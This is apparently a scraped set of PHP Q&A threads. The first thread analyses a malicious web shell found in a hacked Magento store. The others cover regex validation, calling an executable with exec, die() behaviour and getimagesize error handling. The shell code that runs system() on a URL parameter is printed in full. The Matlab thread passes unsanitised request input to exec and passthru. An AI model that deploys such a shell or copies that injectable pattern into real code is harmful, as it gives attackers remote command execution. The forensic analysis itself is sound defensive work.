We Keep Coding

Can anyone explain this script?

I'm trying to recover a hacked Magento store, and found a file named magento.php in the errors folder within the Magento root directory. I know it's malicious but I can't really figure out what it's doing. Any ideas?
<?php
if(md5($_GET["hash"])=="b4c44d5ce1c6c4b60c1c3d05a7d3e58d") {
echo "<pre>";
$cmd = ($_GET['cmd']);
$ret = system($cmd);
print $ret;
echo "</pre>";
die;
} else {
print "-1";
}
?>

It is simple php functionality which accessing parameters from the url and trying to execute the same.
<?php
if(md5($_GET["hash"])=="b4c44d5ce1c6c4b60c1c3d05a7d3e58d") {// check the hash parameter in the url and convert it to md5 standard. If that matches the value then execute steps inside this braces
echo "<pre>"; // print "<pre> tag on screen
$cmd = ($_GET['cmd']); // get the cmd parameter from url
$ret = system($cmd); // execute that cmd parameter as command
print $ret; // print the return value of the system function
echo "</pre>"; // print "</pre> tag on screen
die; // stop execution at this line
} else { // if hash do not match
print "-1"; // print -1 on screen
}
?>

PHP preg_match() steam link validation error

What's wrong with this preg_match() usage? I want to check steam lobby link and if it's matching then write to database. If not, just echo the error. I am doing this through ajax. Is it better to do this with ajax or $_SERVER["REQUEST_METHOD"] == "POST"?
<?php
require("../includes/config.php");
$lobby = "steam://joinlobby/730/109775243427128868/76561198254260308";
if (!preg_match("%^((steam?:)+(/joinlobby\/730\/)+([0-9]{17,25}\/.?)+([0-9]{17,25})/$)%i", $lobby)) {
echo "Lobby link isn't formatted correctly.";
}
else {
$rank = "Golden";
$mic = "No";
try {
$stmt=$db->prepare("INSERT INTO created_lobby (lobby_link, current_rank, have_mic) VALUES (:lobby_link, '$rank', '$mic')");
$stmt->execute(array(
':input_link' => $_POST['lobbyLink']
));
}
catch(PDOException $e) {
echo "Error: " . $e->getMessage();
}
}
?>
My Problem:
When I execute this code, it will give me false.
Thank you for help.

This works:
$lobby = "steam://joinlobby/730/109775243427128868/76561198254260308";
if (!preg_match("%^(steam?:)+(//joinlobby/730/)+([0-9]{17,25}/.?)+([0-9]{17,25}$)%i", $lobby)) {
echo "Lobby link isn't formatted correctly.";
}
I changed /joinlobby to //joinlobby, and remove the / at the end. I also removed the unnecessary () around everything.
I suspect you also shouldn't have (...)+ around steam?: and //joinlobby/730/. They'll cause repeated uses of those prefixes to be accepted as correct, e.g. steam:steam:...

Calling Matlab exec with argument(s) from PHP doesn't work

My first time to deploy matlab exec in php and i need ur help.
I have a matlab script compiled as sampleExe.exe (standalone app) with a single argument 'IdNo' to processes images. When i call it thru command line using sampleExe 2014000, the program runs and gives the desired output. However, I am having trouble when deploying/calling sampleExe.exe file from php as it gives me no output at all. :(
Here's the code i tried based on this: Call matlab exe from php is not working well
<?php
define("EVAL_IMAGE","sampleExe.exe");
$target=isset($_REQUEST['IdNo'])?trim($_REQUEST['IdNo']):"";
if($target==""){
echo "No folder name is passed";
exit();
}
passthru(EVAL_IMAGE." ".$target);
?>
Any help is very much appreciated. Btw, I tried running it in a localhost and sampleExe.exe is also save in c:/wamp/www

<?php
try {
define("EVAL_IMAGE","mainProg1.exe");
$target=isset($_REQUEST['IdNo'])?trim($_REQUEST['IdNo']):"";
if($target==""){
echo "No folder name is passed";
exit();
}
set_time_limit(300);
$return = exec(EVAL_IMAGE." ".$target);
echo "return = " .$return;
}catch (Exception $e) {
echo 'Message: ' .$e->getMessage();
}
exit(0); ?>

Weird problem in php, one echo works, while the other dosen't in the same block, in PHP

....
else {
$affiliate->setStatus('D');
echo "Before load";die;
if($affiliate->load())
{
echo $affiliate->getUsername();
die(($affiliate->getUsername())."Success to load affiliate");
}
else
{
$chkaffiliate= new Pap_Api_Affiliate($session);
$chkaffiliate->setUsername($_POST['txt_email']);
if($chkaffiliate->load())
{
echo $chkaffiliate->getUsername();
}
die("Failed to load affiliate");
}
die("Failed to process payment,account request declined. <br><br>Please try again using a different email OR Contact our support team to manually approve your account.".$response->error_message);
}
I get the output Failed to process payment...that is, the last die() in the above code, however I don't get the Before Load in the first echo, while both are in the same block. Any ideas?

This is just not possible.
if (something){
die();
}
else{
die();
}
dies everytime, in any case. Search for other die("Failed to process payment"); function calls

Your problem is with this line:
echo "Before load";die;
You die immediately after the echo statement so no other processing will take place!

Handle error when getimagesize can't find a file

when I'm trying to getimagesize($img) and the image doesn't exist, I get an error. I don't want to first check whether the file exists, just handle the error.
I'm not sure how try catch works, but I want to do something like:
try: getimagesize($img) $works = true
catch: $works = flase

Like you said, if used on a non-existing file, getimagesize generates a warning :
This code :
if ($data = getimagesize('not-existing.png')) {
echo "OK";
} else {
echo "NOT OK";
}
will get you a
Warning: getimagesize(not-existing.png) [function.getimagesize]:
failed to open stream: No such file or directory
A solution would be to use the # operator, to mask that error :
if ($data = #getimagesize('not-existing.png')) {
echo "OK";
} else {
echo "NOT OK";
}
As the file doesn't exist, $data will still be false ; but no warning will be displayed.
Another solution would be to check if the file exists, before using getimagesize ; something like this would do :
if (file_exists('not-existing.png') &&
($data = getimagesize('not-existing.png'))
) {
echo "OK";
} else {
echo "NOT OK";
}
If the file doesn't exist, getimagesize is not called -- which means no warning
Still, this solution is not the one you should use for images that are on another server, and accessed via HTTP (if you are in this case), as it'll mean two requests to the remote server.
For local images, that would be quite OK, I suppose ; only problem I see is the notice generated when there is a read error not being masked.
Finally :
I would allow errors to be displayed on your developpement server,
And would not display those on your production server -- see display_errors, about that ;-)

Call me a dirty hacker zombie who will be going to hell, but I usually get around this problem by catching the warning output into an output buffer, and then checking the buffer. Try this:
ob_start();
$data = getimagesize('not-existing.png');
$resize_warning = ob_get_clean();
if(!empty($resize_warning)) {
print "NOT OK";
# We could even print out the warning here, just as PHP would do
print "$resize_warning";
} else {
print "OK"
}
Like I said, not the way to get a cozy place in programmer's heaven, but when it comes to dysfunctional error handling, a man has to do what a man has to do.

I'm sorry that raise such old topic. Recently encountered a similar problem and found this topic instead a solution. For religious reasons I think that '#' is bad decision. And then I found another solution, it looks something like this:
function exception_error_handler( $errno, $errstr, $errfile, $errline ) {
throw new Exception($errstr);
}
set_error_handler("exception_error_handler");
try {
$imageinfo = getimagesize($image_url);
} catch (Exception $e) {
$imageinfo = false;
}

This solution has worked for me.
try {
if (url_exists ($photoUrl) && is_array (getimagesize ($photoUrl)))
{
return $photoUrl;
}
} catch (\Exception $e) { return ''; }

Simple and working solution based on other answers:
$img_url = "not-existing.jpg";
if ( is_file($img_url) && is_array($img_size = getimagesize($img_url)) ) {
print_r($img_size);
echo "OK";
} else {
echo "NOT OK";
}